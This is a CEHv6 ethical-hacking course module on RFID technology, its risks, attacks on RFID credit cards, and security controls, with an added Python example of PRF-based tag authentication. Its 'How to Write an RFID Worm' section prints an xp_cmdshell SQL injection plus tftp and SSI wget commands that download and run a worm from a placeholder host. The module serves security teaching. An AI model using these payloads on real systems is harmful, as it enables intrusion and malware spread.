CEHv6 Module 39: RFID Hacking

  

Ethical Hacking and Countermeasures, Version 6

Module XXXIX: RFID Hacking

News Source: http://www.theregister.co.uk/

Module Objective

This module will familiarize you with:

  • RFID
  • Components of RFID systems
  • RFID System Architecture
  • RFID Collisions
  • RFID Risks
  • RFID and Privacy Issues
  • RFID Security and Privacy Threats
  • Vulnerabilities in RFID-enabled Credit Cards
  • RFID Hacking Tool
  • RFID Security Controls

Module Flow

  • RFID
  • Components of RFID systems
  • RFID System Architecture
  • RFID Collisions
  • RFID Risks
  • RFID and Privacy Issues
  • RFID Security and Privacy Threats
  • Vulnerabilities in RFID-enabled Credit Cards
  • RFID Hacking Tool
  • RFID Security Controls

RFID

Radio Frequency Identification (RFID) is an automatic identification method. It transmits the identity of an object in the form of a unique serial number using radio waves. RFID systems work on the principle of contactless transfer of data between a data-carrying device and its reader.

RFID (cont'd)

RFID tags contain at least two parts:

  • An integrated circuit to store and process information, and to modulate and demodulate a radio-frequency (RF) signal
  • An antenna for receiving and transmitting the signal

Components of RFID Systems

Basic components of an RFID system:

  • Tags
  • Tag readers
  • RFID antenna
  • RFID controller
  • RFID premises server
  • RFID integration server

General categories of RFID tags:

  • Passive: requires no internal power source
  • Active: requires an internal power source (small battery)
  • Semi-passive (battery-assisted): requires an internal power source (small battery)

RFID Collisions

RFID Tag Collision:

  • RFID tag collision happens when multiple tags are energized by an RFID tag reader simultaneously, and reflect their respective signals back to the reader at the same time

RFID Reader Collision:

  • Reader collision occurs in RFID systems when the coverage area of one RFID reader overlaps with that of another reader
  • This causes two different problems:
    • Signal interference
    • Multiple reads of the same tag

RFID Risks

  • Business Process Risk
  • Business Intelligence Risk
  • Privacy Risk
  • Externality Risk
    • Hazards of Electromagnetic Radiation
    • Computer Network Attacks

RFID Risks: Business Process Risk

Direct attacks on RFID system components could potentially undermine the business processes which the RFID system was designed to enable. RFID systems typically are implemented to replace or enhance a paper or partially automated process, so organizations implementing RFID systems could become reliant on those systems. Failure in any component or subsystem of the RFID system could result in system-wide failure. Unlike most other risks, business process risk can occur as a result of both human action and natural causes: if the network supporting the RFID system is down, then the RFID system is likely to be down as well.

RFID Risks: Business Intelligence Risk

RFID supports wireless remote access to information about assets and people that either previously did not exist or was difficult to create or dynamically maintain. A competitor or adversary can gain information from an RFID system in a number of ways:

  • Eavesdropping on RF links between readers and tags
  • Performing independent queries on tags to obtain relevant data
  • Obtaining unauthorized access to a back-end database which stores information about tagged items

Using controls such as database access controls, password protection, and cryptography can significantly mitigate business intelligence risk if applied properly.

RFID Risks: Privacy Risk

Business objectives often conflict with privacy objectives. Organizations can benefit from analysis and sharing of personal information obtained with RFID technology. Privacy risk from the perspective of an organization implementing RFID might include:

  • Penalties if the organization does not comply with privacy laws and regulations
  • Customer avoidance or boycott of the organization because of real or perceived privacy concerns about RFID technology
  • Being held legally liable for any consequences of weak privacy protections
  • Employees, shareholders, and other stakeholders might disassociate from the organization due to concerns about corporate social responsibility

RFID Risks: Privacy Risk (cont'd)

Other factors that impact the level of privacy risk include:

  • Whether personal information is stored on tags
  • Whether tagged items are considered personal
  • The likelihood that the tag will be in proximity of compatible readers
  • Length of time records are retained in analytic or archival systems
  • Effectiveness of RFID security controls, in particular:
    • Efficiency of tag memory access control and authentication mechanisms
    • Ability of tags to be disabled after their use in a business process
    • Ability of users to effectively shield tags to prevent unauthorized read transactions

RFID Risks: Externality Risk

RFID systems typically are not isolated from other systems and assets in the enterprise. Externality risks can exploit both the RF and enterprise subsystems of an RFID system:

  • The major externality risk for the RF subsystem is hazards resulting from electromagnetic radiation
  • The major externality risk for the enterprise subsystem is computer network attacks on networked devices and applications

As externality risk by definition involves risks outside of the RFID system, it is distinct from both business process and business intelligence risks.

RFID and Privacy Issues

Any organization contemplating the use of RFID should first ensure that it is aware of its privacy obligations under different laws before it starts accumulating data.

RFID attacks used to bypass personal privacy information are:

  • Placing RFID tags hidden from view and using them for stealth tracking
  • Using the unique identifiers provided by RFID for profiling and identifying consumer patterns and behavior
  • Using hidden readers for stealth tracking and getting personal information

Countermeasures

Methods that are used to avoid RFID attacks:

RSA Blocker Tags:

  • A blocker tag helps maintain the privacy of the consumer by spamming any reader that attempts to scan tags without authorization

Kill Switches:

  • Newer RFID tags are being shipped with a kill switch, which allows the RFID tag to be disabled

RFID Security and Privacy Threats

  • Sniffing
  • Tracking
  • Spoofing
  • Replay attacks
  • Denial-of-service

Sniffing

RFID tags are designed to be readable by any compliant reader, so it is easy to collect RFID data by eavesdropping on the wireless RFID channel. Unrestricted access to tag data can have serious implications: collected tag data might reveal information such as medical predispositions or unusual personal inclinations, causing denial of insurance coverage or employment for an individual.

Tracking

RFID technology facilitates secret monitoring of an individual's location and actions. RFID readers placed in strategic locations can record an RFID tag's unique responses, which can then be persistently associated with a person's identity. RFID tags without unique identifiers also facilitate tracking by forming constellations, meaning recurring groups of tags that are associated with an individual.

Spoofing

Attackers can mimic authentic RFID tags by writing appropriately formatted data onto blank RFID tags. Tag cloning is another kind of spoofing attack, which produces unauthorized copies of legitimate RFID tags.

Researchers from Johns Hopkins University recently cloned a cryptographically protected Texas Instruments digital signature transponder.

Replay Attacks

RFID relay devices can intercept and retransmit RFID queries, which offenders can use to abuse various RFID applications. England's new RFID-enabled license plates, e-Plates, are an example of a modern RFID system that is susceptible to attack by a relay device. Active e-Plate tags contain an encrypted ID code that is stored in the UK Ministry of Transport's vehicle database. An attacker can record the encrypted identifier when another car's license plate is scanned and replay it later.

Denial-of-service

Thieves can exploit RFID tags and back-end databases to steal RFID-tagged items by removing the tags from the items completely, or by putting the items in a foil-lined booster bag that blocks the RFID reader's query signals and temporarily deactivates the items. Another attack takes the opposite approach: flooding an RFID system with more data than it can handle. An attacker can also remove RFID tags and plant them on other items, causing RFID systems to record useless data, discrediting and devaluing RFID technology.

Protection against RFID Attacks

Cryptography:

  • Minimalist cryptography
  • Human-computer authentication
  • Hash locks

Detection and evasion:

  • RFID Detektor (http://tinyurl.com/)
  • Data Privatizer (https://shop.foebud.org/)
  • RFID Guardian (www.rfidguardian.org)

Temporary Deactivation:

  • Consumers can deactivate their RFID tags to avoid most modern-day threats

Other techniques:

  • Periodic modification of RFID tag identifiers' appearance and data

RFID Guardian

RFID Guardian is a mobile, battery-powered device that offers personal RFID security and privacy management for people. It monitors and regulates RFID usage on behalf of customers. It is meant for personal use and manages the RFID tags within physical proximity of a person. It acts like an RFID reader, querying tags and decoding the tag responses, and it can also emulate an RFID tag, allowing it to perform direct in-band communications with other RFID readers. RFID Guardian is the integration of four separate security properties into a single device:

  • Auditing
  • Key management
  • Access control
  • Authentication

RFID Malware

RFID malware is transmitted and executed via an RFID tag:

  • Threats arise when criminals cause valid RFID tags to behave in unexpected ways
  • If certain vulnerabilities exist in RFID software, an RFID tag can be infected with a virus
  • When an unsuspecting reader scans an infected tag, there is a danger of the tag exploiting a vulnerability

Classes of RFID Malware:

  • RFID Exploit:
    • It is malicious RFID tag data that exploits some vulnerability of the RFID system
  • RFID Worm:
    • It is an RFID-based exploit that abuses a network connection to achieve self-replication
  • RFID Virus:
    • It is an RFID-based exploit that autonomously self-replicates its code to new RFID tags, without requiring a network connection

How to Write an RFID Virus

A virus performs two types of functions: it replicates itself using the database, and optionally it executes a payload. Broadly there are two types of virus replication:

Replication Using Self-Referential Queries

  • Database systems usually offer a way to obtain the currently running queries for system administration purposes
  • There are two versions of the virus: one contains a single query and the other contains multiple queries
  • The single-query virus requires fewer features from the database, but cannot carry SQL code as a payload
  • The multiple-query virus requires a database that supports multiple queries, but can carry SQL code as a payload

Replication Using Quines

  • A quine is a program that prints its own source code
  • It copies its own source code into the database, which is later copied onto tags
  • Quines require multiple queries, which means they are not supported on all databases
  • They allow SQL code to be executed as a payload

How to Write an RFID Worm

A worm is a program that self-propagates across a network, exploiting security flaws in widely-used services. An RFID worm propagates by exploiting security flaws in online RFID services. RFID worms do not require users to do anything to propagate, although they also spread via RFID tags, if given the opportunity.

Propagation:

  • RFID tags are too small to carry an entire worm
  • The tag contains only enough of the worm to download the rest from a computer connected to the Internet

How to Write an RFID Worm (cont'd)

An RFID tag can either include binary code to download and execute the worm, or shell commands.

Example 1 - Executing shell commands using SQL Server:

Apples'; EXEC Master..xp_cmdshell 'shell commands';

Example 2 - Downloading and executing a worm on Windows:

cd \Windows\Temp & tftp -i <ip> GET worm.exe & worm.exe

Example 3 - Downloading and executing a worm on Linux using SSI:

<!--#exec cmd="wget http://ip/worm -O /tmp/worm; chmod +x /tmp/worm; /tmp/worm"-->

Defending Against RFID Malware

Lock down RFID user accounts and database accounts. Disable or remove any features that are not required. To avoid SQL injection:

  • Any data that is copied into a SQL statement should be checked and escaped using the functions provided by the database API
  • For better security, do not copy data into SQL statements at all, but use prepared statements and parameter binding

Client-side scripting can be prevented by properly escaping data inserted into HTML pages. Buffer overflows can be prevented by properly checking buffer bounds.

RFID Exploits

SQL Injection:

  • If the RFID middleware does not process the data read from the tag correctly, it is possible to exploit this vulnerability of the database by executing SQL code that is stored on the tag

Client-side Scripting:

  • Exploiting dynamic features offered by modern browsers, by including JavaScript code on the tag

Image caption: The World's First RFID Chip Infected with a Virus

Buffer Overflow:

  • Exploiting the limited memory of an RFID tag by reading more data than expected, causing its buffer to overflow

Vulnerabilities in RFID-enabled Credit Cards

Tracking Attack

  • In this attack, a legitimate merchant exceeds the expected use of his/her RFID credit card readers

Eavesdropping Attack

  • In an eavesdropping attack, an adversary uses an antenna to record communication between a legitimate RF device and a reader
  • As eavesdropping happens on live communication, foil shielding does not help to prevent this particular attack
  • Eavesdropping feasibility depends on many factors, including read distance

Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Skimming Attack

  • In this attack, an unauthorized and potentially clandestine reader reads tags from either close proximity or from a distance
  • The Johnny Carson attack on RFID credit cards occurs when an attacker has access to the physical mail stream to read RF data from credit cards in transit to their owners
  • This attack is particularly powerful because the adversary gains accessory knowledge such as the cardholder's address
  • A compromised reader at a parking garage could skim customers' credit-card information at the same time that it reads the parking pass
  • Fob-type RFID credit cards are now available for attachment to key rings, exposing them to attack when consumers leave their keys unattended
  • This behavior is seen most often in valet-parking situations, or in gymnasiums where it is common for users to leave their keys together in an unsecured box by the door

Vulnerabilities in RFID-enabled Credit Cards (cont'd)

Replay and Relay Attack

  • In a replay attack, an attacker broadcasts an exact replay of the transponder end of the radio signal recorded from a past transaction between an RF device and a reader
  • A related attack, commonly known as the relay attack, uses a man-in-the-middle attack to relay a transient connection from a legitimate reader through one or more adversarial devices to a legitimate tag which may be at a considerable distance
  • The distance at which the relay attack can succeed is limited only by the latency which will be tolerated by the attacked protocol

Cross-contamination Attack

  • The cross-contamination attack occurs when private information such as cardholder name, number, and expiration date learned by an attacker in an RF context is then used by the attacker in a different context
  • The attacker can use this data to create a magstripe card, re-encode the stripe on an existing card, or use the data in a 'card-not-present' transaction such as a telephone or online mail-order purchase

  

RFID Hacking Tool

RFDump

RFDump is a tool that allows you to read RFID tags within range, and to change and alter all the data stored in the RFID tag. RFDump is a back-end GPL tool that directly interoperates with any RFID ISO reader to make the contents stored on RFID tags accessible. The user data can be displayed and modified using either a hex or an ASCII editor. RFDump works with the ACG multi-tag reader or similar card reader hardware.

RFDump: Screenshot 1

RFDump: Screenshot 2

RFID Security Controls

Management Controls

A management control involves oversight of the security of the RFID system. The management of an organization might need to update existing policies to address RFID implementations.

Management controls are typically involved in risk assessment, system planning, and system acquisition, as well as security certifications, accreditations, and assessments.

The management controls for RFID systems:

  • RFID Usage Policy
  • IT Security Policies
  • Agreements with External Organizations
  • Minimizing Sensitive Data Stored on Tags

Operational Controls

An operational control involves the actions performed on a daily basis by the system's administrators and users.

There are several types of operational controls:

  • Physical access controls restrict access to authorized personnel where the RFID systems are deployed
  • Proper placement of RF equipment helps to avoid interference and reduce hazards from electromagnetic radiation
  • Organizations can destroy tags after they are no longer useful, to prevent adversaries from gaining access to their data
  • Operator training ensures that personnel using the system follow appropriate guidelines and policies
  • Information labels and notices can inform users of the intended purposes of the RFID system and of simple methods users can employ to mitigate risk

Technical Controls

A technical control uses technology to monitor or restrict the actions that can be performed within the system. Some technical controls are specified in standards, while others are available only in proprietary systems. Many technical controls related to a tag require the tag to perform additional computations and to have additional volatile memory. Technical controls exist for all components of RFID systems, including the RF, enterprise, and inter-enterprise subsystems.

The general types of RF subsystem controls include controls to:

  • Provide authentication and integrity services to RFID components and transactions
  • Protect RF communication between reader and tag
  • Protect the data stored on tags

RFID Security

  • Tags can be set to have a security bit turned on in a reserved memory block on the tag
  • Random transaction IDs should be present on rewritable tags
  • Improved passwords via persistent state
  • Mutual authentication of tag and reader with privacy for the tag:
    • PRF Private Authentication Scheme
    • Tree-Based Private Authentication
    • A Two-Phase Tree Scheme
  • Security to protect the read-write options:
    • Password protected
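As an added example (not code from the course material or from any RFID product), a simplified version of the PRF private authentication scheme listed above, with HMAC-SHA256 standing in for the PRF; the message layout, 8-byte nonces and domain-separation bytes are assumptions made for this illustration. It shows why the reader must search its whole key store (the price of keeping the tag identifier off the air) and why a recorded tag answer, as in the replay attack described earlier, fails under a fresh challenge.

```python
import hashlib
import hmac
import os


def prf(key: bytes, *parts: bytes) -> bytes:
    # f_k(x): a keyed PRF over the concatenated fields. Each field is
    # length-prefixed so that adjacent fields cannot be re-split ambiguously.
    msg = b"".join(len(p).to_bytes(2, "big") + p for p in parts)
    return hmac.new(key, msg, hashlib.sha256).digest()


class Tag:
    def __init__(self, secret: bytes):
        self.secret = secret  # per-tag secret, shared only with the back end

    def respond(self, r_reader: bytes) -> tuple:
        # Tag answers with a fresh nonce and f_s(0, r_reader, r_tag). No
        # identifier is sent in clear, so a sniffer cannot tell which tag spoke.
        r_tag = os.urandom(8)
        return r_tag, prf(self.secret, b"\x00", r_reader, r_tag)

    def verify_reader(self, r_reader: bytes, r_tag: bytes, tau: bytes) -> bool:
        # Second half of the mutual authentication: only a reader that knows the
        # secret can produce f_s(1, r_reader, r_tag).
        return hmac.compare_digest(tau, prf(self.secret, b"\x01", r_reader, r_tag))


class Reader:
    def __init__(self, tag_db: dict):
        self.tag_db = tag_db  # tag id -> secret, held by the reader/back end

    def challenge(self) -> bytes:
        return os.urandom(8)

    def identify(self, r_reader: bytes, r_tag: bytes, sigma: bytes) -> tuple:
        # With no identifier to index on, the reader tries every enrolled secret;
        # this linear search is the cost of tag privacy in the basic PRF scheme.
        for tag_id, secret in self.tag_db.items():
            if hmac.compare_digest(sigma, prf(secret, b"\x00", r_reader, r_tag)):
                return tag_id, prf(secret, b"\x01", r_reader, r_tag)
        return None, None


def run_protocol(reader: Reader, tag: Tag) -> tuple:
    # Full exchange: challenge, tag response, reader search, reader proof.
    r_r = reader.challenge()
    r_t, sigma = tag.respond(r_r)
    tag_id, tau = reader.identify(r_r, r_t, sigma)
    mutual_ok = tau is not None and tag.verify_reader(r_r, r_t, tau)
    return tag_id, mutual_ok


def replay_is_rejected(reader: Reader, tag: Tag) -> bool:
    # A recorded tag answer is replayed against a later challenge: the reader's
    # fresh nonce is bound into the PRF output, so the old response matches nothing.
    r_r = reader.challenge()
    r_t, sigma = tag.respond(r_r)
    replayed_id, _ = reader.identify(reader.challenge(), r_t, sigma)
    return replayed_id is None


def demo() -> tuple:
    # Constructed key material: two tags enrolled in the reader's key store.
    tag_secrets = {"tag-A": b"A" * 16, "tag-B": b"B" * 16}
    reader = Reader(tag_secrets)
    tag_b = Tag(tag_secrets["tag-B"])
    tag_id, mutual_ok = run_protocol(reader, tag_b)
    return tag_id, mutual_ok, replay_is_rejected(reader, tag_b)


if __name__ == "__main__":
    print(demo())  # ('tag-B', True, True)
```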

Summary

  • Radio Frequency Identification (RFID) is an automatic identification method
  • An RFID tag is an electronic device that holds data
  • An RFID reader is a device that is used to interrogate an RFID tag
  • RFID stations can read and update information stored in the RFID tag
  • RFID standards define Air Interface Protocol, Data Content, Conformance, and Applications
  • The protective measures against RFID attacks are Cryptography, Detection and evasion, Temporary Deactivation, and Other techniques